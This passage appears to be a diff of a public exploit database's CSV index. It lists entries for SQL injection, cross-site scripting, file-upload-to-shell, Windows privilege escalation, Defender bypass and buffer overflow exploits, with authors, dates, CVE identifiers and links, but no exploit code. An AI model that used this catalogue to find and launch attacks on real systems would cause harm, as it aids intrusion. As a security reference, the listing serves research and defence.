51472,exploits/php/webapps/51472.txt,"Smart School v1.0 - SQL Injection",2023-05-23,"Ahmet Ümit BAYRAM",webapps,php,,2023-05-23,2023-05-23,0,,,,,,
45049,exploits/php/webapps/45049.txt,"Smart SMS & Email Manager 3.3 - 'contact_type_id' SQL Injection",2018-07-18,AkkuS,webapps,php,80,2018-07-18,2018-07-18,0,,"SQL Injection (SQLi)",,,,
34067,exploits/php/webapps/34067.txt,"Smart Statistics 1.0 - 'smart_Statistics_admin.php' Cross-Site Scripting",2010-01-10,R3d-D3V!L,webapps,php,,2010-01-10,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40468/info
@ -32795,6 +32817,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
32444,exploits/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - '/wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",webapps,php,,2008-09-29,2014-03-23,1,CVE-2008-4671;OSVDB-48635,,,,,https://www.securityfocus.com/bid/31482/info
5066,exploits/php/webapps/5066.php,"WordPress MU < 1.3.2 - 'active_plugins' Code Execution",2008-02-05,"Alexander Concha",webapps,php,,2008-02-04,,1,OSVDB-41134;CVE-2008-5695,"WordPress Plugin",,,,http://www.buayacorp.com/files/wordpress/wordpress-mu-options-overwrite.html
8196,exploits/php/webapps/8196.txt,"WordPress MU < 2.7 - 'HOST' HTTP Header Cross-Site Scripting",2009-03-10,"Juan Galiana Lara",webapps,php,,2009-03-09,,1,OSVDB-52814;CVE-2009-1030,,,,,
51959,exploits/php/webapps/51959.txt,"Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)",2024-04-02,"Milad karimi",webapps,php,,2024-04-02,2024-04-02,0,CVE-2022-4395,,,,,
35212,exploits/php/webapps/35212.txt,"WordPress Plugin / Joomla! Component XCloner - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",webapps,php,80,2014-11-10,2014-11-10,0,OSVDB-114181;CVE-2014-8607;CVE-2014-8606;CVE-2014-8605;CVE-2014-8604;CVE-2014-8603;OSVDB-114180;OSVDB-114179;OSVDB-114178;OSVDB-114177;OSVDB-114176,"WordPress Plugin",,,http://www.exploit-db.comxcloner-backup-and-restore.3.1.1.zip,http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/
35057,exploits/php/webapps/35057.py,"WordPress Plugin 0.9.7 / Joomla! Component 2.0.0 Creative Contact Form - Arbitrary File Upload",2014-10-25,"Claudio Viviani",webapps,php,,2014-10-25,2014-10-25,0,OSVDB-113673;OSVDB-113669;CVE-2014-8739,,,,,
35430,exploits/php/webapps/35430.txt,"WordPress Plugin 1 Flash Gallery 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",webapps,php,,2011-03-08,2014-12-02,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/46783/info
@ -39649,6 +39672,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
2950,exploits/windows/local/2950.c,"AstonSoft DeepBurner 1.8.0 - '.dbr' File Parsing Buffer Overflow",2006-12-19,Expanders,local,windows,,2006-12-18,2016-10-27,1,OSVDB-32356;CVE-2006-6665,,,,,
48206,exploits/windows/local/48206.txt,"ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path",2020-03-12,"Roberto Piña",local,windows,,2020-03-12,2020-03-12,0,,,,,,
48193,exploits/windows/local/48193.txt,"ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path",2020-03-11,"Roberto Piña",local,windows,,2020-03-11,2020-03-11,0,,,,,,
51939,exploits/windows/local/51939.txt,"ASUS Control Center Express 01.06.15 - Unquoted Service Path",2024-04-02,"Alaa Kachouh",local,windows,,2024-04-02,2024-04-02,0,,,,,,
50985,exploits/windows/local/50985.txt,"Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path",2022-07-29,"Angelo Pio Amirante",local,windows,,2022-07-29,2022-07-29,0,CVE-2022-35899,,,,,
48173,exploits/windows/local/48173.txt,"ASUS GiftBox Desktop 1.1.1.127 - 'ASUSGiftBoxDesktop' Unquoted Service Path",2020-03-06,"Oscar Flores",local,windows,,2020-03-06,2020-03-06,0,,,,,,
49888,exploits/windows/local/49888.txt,"ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path",2021-05-20,"Alejandra Sánchez",local,windows,,2021-05-20,2021-05-20,0,,,,,,
@ -40958,6 +40982,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
47684,exploits/windows/local/47684.md,"Microsoft Windows 10 Build 1803 < 1903 - 'COMahawk' Local Privilege Escalation",2019-11-14,TomahawkAPT69,local,windows,,2019-11-19,2019-11-19,0,CVE-2019-1405;CVE-2019-1322,,,,,https://github.com/apt69/COMahawk
47915,exploits/windows/local/47915.py,"Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)",2020-01-13,"Nassim Asrir",local,windows,,2020-01-13,2020-01-13,0,,,,,,
47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows,,2019-07-12,2019-07-12,1,CVE-2019-1019,Local,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1817
51946,exploits/windows/local/51946.rb,"Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation",2024-04-02,"E1 Coders",local,windows,,2024-04-02,2024-04-02,0,CVE-2024-21338,,,,,
51733,exploits/windows/local/51733.txt,"Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)",2023-10-09,"Moein Shahabi",local,windows,,2023-10-09,2023-10-09,0,,,,,,
40219,exploits/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",local,windows,,2016-08-08,2016-08-08,1,CVE-2016-3223;MS16-072,,,,,
14733,exploits/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll wab.exe' DLL Hijacking",2010-08-24,TheLeader,local,windows,,2010-08-25,2010-08-25,0,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
@ -40980,6 +41005,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",2021-09-24,hyp3rlinx,local,windows,,2021-09-24,2021-09-24,0,,,,,,
46222,exploits/windows/local/46222.txt,"Microsoft Windows CONTACT - HTML Injection / Remote Code Execution",2019-01-23,hyp3rlinx,local,windows,,2019-01-23,2019-01-24,1,,,,,,
46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,,2019-01-17,2019-01-18,1,,,,,,
51960,exploits/windows/local/51960.txt,"Microsoft Windows Defender - Detection Mitigation Bypass TrojanWin32Powessere.G",2024-04-02,hyp3rlinx,local,windows,,2024-04-02,2024-04-02,0,,,,,,
50654,exploits/windows/local/50654.txt,"Microsoft Windows Defender - Detections Bypass",2022-01-12,hyp3rlinx,local,windows,,2022-01-12,2022-01-12,0,,,,,,
51873,exploits/windows/local/51873.txt,"Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass",2024-03-11,hyp3rlinx,local,windows,,2024-03-11,2024-03-11,0,,,,,,
40562,exploits/windows/local/40562.cpp,"Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",local,windows,,2016-10-17,2016-10-17,1,CVE-2016-7188;MS16-125,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=887
@ -41477,6 +41503,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
51611,exploits/windows/local/51611.py,"RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)",2023-07-20,"Andre Nogueira",local,windows,,2023-07-20,2023-07-20,0,,,,,,
8193,exploits/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,local,windows,,2009-03-09,,1,OSVDB-52534,,,,,
40145,exploits/windows/local/40145.txt,"Rapid7 AppSpider 6.12 - Local Privilege Escalation",2016-07-25,LiquidWorm,local,windows,,2016-07-25,2016-07-25,1,,,,,,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5344.php
51941,exploits/windows/local/51941.txt,"Rapid7 nexpose - 'nexposeconsole' Unquoted Service Path",2024-04-02,"Saud Alenazi",local,windows,,2024-04-02,2024-04-02,0,,,,,,
48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows,,2020-09-14,2020-09-14,0,,,,,,
46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,,2019-04-25,2019-04-25,1,CVE-2018-20250,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwrar561tr.exe,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/fileformat/winrar_ace.rb
46756,exploits/windows/local/46756.rb,"RARLAB WinRAR 5.61 - ACE Format Input Validation Remote Code Execution (Metasploit)",2019-04-25,Metasploit,local,windows,,2019-04-25,2019-04-25,1,CVE-2018-20250,Local,,,http://www.exploit-db.comwrar561tr.exe,https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/fileformat/winrar_ace.rb

Can't render this file because it is too large.